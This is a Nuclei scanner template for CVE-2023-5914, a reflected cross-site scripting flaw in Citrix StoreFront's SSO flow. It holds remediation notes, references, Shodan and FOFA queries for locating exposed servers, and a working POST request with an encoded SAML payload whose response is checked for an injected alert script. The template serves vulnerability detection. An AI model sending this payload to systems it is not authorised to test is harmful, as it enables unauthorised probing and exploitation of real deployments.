id: CVE-2023-5914

info:
  name: Citrix StoreFront - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript via reflected XSS during XML parsing in the SSO flow, potentially stealing user credentials or session tokens.
  remediation: |
    Apply Citrix security updates immediately. Update to StoreFront versions 2402, 2203 CU1, 2203 LTSR CU5, 1912 LTSR CU8, or later.
  reference:
    - https://www.assetnote.io/resources/research/continuing-the-citrix-saga-cve-2023-5914-cve-2023-6184
    - https://support.citrix.com/article/CTX583759/citrix-storefront-security-bulletin-for-cve20235914
    - https://www.youtube.com/watch?v=t8MeUQrPqec
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5914
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5914
    cwe-id: CWE-79
    epss-score: 0.73142
    epss-percentile: 0.99387
    cpe: cpe:2.3:a:cloud:citrix_storefront:*:*:*:*:ltsr:*:*:*
  metadata:
    max-request: 1
    vendor: cloud
    product: citrix_storefront
    shodan-query:
      - html:"/Citrix/StoreWeb"
      - http.html:"/citrix/storeweb"
    fofa-query: body="/citrix/storeweb"
  tags: cve,xss,citrix,storefront,cve2023,cloud,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/Citrix/teststoreAuth/SamlTest"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(1)</script>", "XmlException")'
        condition: and
# digest: 4b0a00483046022100fe02365c1f6d60ed7879b016b55b1ca63e1ef51821d430200cb14abd5b1782c5022100c9af1d17453686abd61dd3c5220a0b3e840333b827b96748b32c5f393a81b2b6:922c64590222798bb761d5b6d8e72950